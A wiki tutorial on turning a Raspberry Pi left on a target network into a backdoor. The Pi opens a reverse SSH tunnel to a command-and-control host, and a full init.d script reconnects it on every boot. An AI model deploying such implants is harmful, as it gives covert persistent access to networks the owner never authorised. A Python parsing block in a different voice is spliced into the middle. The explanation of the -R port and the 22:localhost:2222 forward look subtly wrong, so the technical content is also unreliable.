From charlesreid1

Revision as of 04:36, 4 August 2015

This article covers how to get a reverse SSH shell to a Raspberry Pi.

Reverse SSH Shell

How to control the Pi once it is placed on a target network? SSH. But how?

Incoming SSH connections (from a command and control server to the Raspberry Pi) can be blocked by firewalls/security measures.

Reverse SSH is a good alternative: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.

SSH Command

The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.

Normally, when you SSH to a machine, you execute a command like:

$ ssh user@remoteserver

But if you use the -R flag, it enables a reverse connection to the listener.

$ ssh -R [bind_address:]port:host:hostport username@remoteserver

Let's ignore bind_address for now.

The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.

host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.

Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.
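
To make the pieces of the -R argument concrete, here is an added example in Python (not code from the original article) that parses a spec of the form [bind_address:]port:host:hostport, validates the ports, and summarizes the result following OpenSSH's documented semantics: sshd on the remote server binds port, and each connection arriving there is delivered from the Pi's side to host:hostport. The IPv6 bracket handling and the describe helper are my additions, not something the page discusses.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class RemoteForward:
    bind_address: Optional[str]  # None: sshd default (loopback unless GatewayPorts is set)
    port: int                    # port sshd opens on the remote (command and control) server
    host: str                    # destination the Pi connects to for each forwarded connection
    hostport: int

def _split_colons(spec):
    """Split on ':' but keep bracketed IPv6 literals such as [::1] intact."""
    parts, buf, depth = [], "", 0
    for ch in spec:
        depth += (ch == "[") - (ch == "]")
        if ch == ":" and depth == 0:
            parts.append(buf)
            buf = ""
        else:
            buf += ch
    parts.append(buf)
    return parts

def _port(text):
    if not text.isdigit() or int(text) > 65535:
        raise ValueError(f"invalid port {text!r}")
    return int(text)

def _unbracket(addr):
    return addr[1:-1] if addr.startswith("[") and addr.endswith("]") else addr

def parse_remote_forward(spec):
    """Parse [bind_address:]port:host:hostport (the -R argument) into a RemoteForward."""
    parts = _split_colons(spec)
    if len(parts) == 3:          # bind_address omitted, as in the page's example
        parts = [None] + parts
    if len(parts) != 4 or not parts[2]:
        raise ValueError(f"expected [bind_address:]port:host:hostport, got {spec!r}")
    bind, port, host, hostport = parts
    return RemoteForward(_unbracket(bind) if bind else None,
                         _port(port), _unbracket(host), _port(hostport))

def describe(spec):
    """Say which side listens and where traffic ends up, per OpenSSH -R semantics."""
    fw = parse_remote_forward(spec)
    listen = f"{fw.bind_address or 'loopback'}:{fw.port}"
    return (f"remote server listens on {listen}, "
            f"Pi forwards each connection to {fw.host}:{fw.hostport}")
```

Running describe("22:localhost:2222") on the page's own spec shows the remote server binding port 22 and the Pi delivering connections to its local port 2222.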

Reverse SSH on Startup

You can run this command on startup, so that on boot, the Pi will attempt to connect to a remote server if it is available.

First, we'll create a startup service that initiates a reverse SSH connection.

Then, we'll give it a whirl.

Add Reverse SSH Startup Service

The following instructions will walk through how to create a reverse SSH startup service on the Raspberry Pi, so that the Pi will automatically seek out and create a reverse SSH connection on boot, if the remote server can be found.

This is done by editing the Linux partition of the SD card (not the 64 MB boot partition - the ~3 GB Linux partition!) and changing some files in the init.d sequence.

Mount SD Card

First, insert the Raspberry Pi SD card into your laptop and mount the volume.

Create Reverse SSH Service

Now you'll create a reverse SSH service in /sdcard/etc/init.d/. I called mine reverse-ssh.

<source lang="bash">
#!/bin/sh
### BEGIN INIT INFO
# Provides:          reverse-ssh
# Required-Start:    $remote_fs $syslog $network
# Required-Stop:     $remote_fs $syslog
# Default-Start:     2 3 4 5
# Default-Stop:
# Short-Description: Reverse SSH
### END INIT INFO

set -e

# The ssh binary that opens the tunnel. Only check that it exists; do not
# source it into this shell.
SSH=/usr/bin/ssh
if [ ! -x "$SSH" ]; then
    echo "$SSH not found, not opening reverse shell." >&2
    exit 0
fi

case "${1:-}" in
  stop|reload|restart|force-reload)
        echo "Too bad."
        ;;
  start)
        echo "Opening reverse shell."
        # -N: no remote command, just the tunnel.  -f: drop to the background
        # after authenticating so the boot sequence does not block on this script.
        # BatchMode: fail instead of prompting, since no terminal is attached at boot;
        # authentication therefore has to be key based.
        "$SSH" -N -f -o BatchMode=yes -R 22:localhost:2222 charles@10.0.0.19
        ;;
  *)
        echo "Usage: ${0:-} {start|stop|status|restart|reload|force-reload}" >&2
        exit 1
        ;;
esac
</source>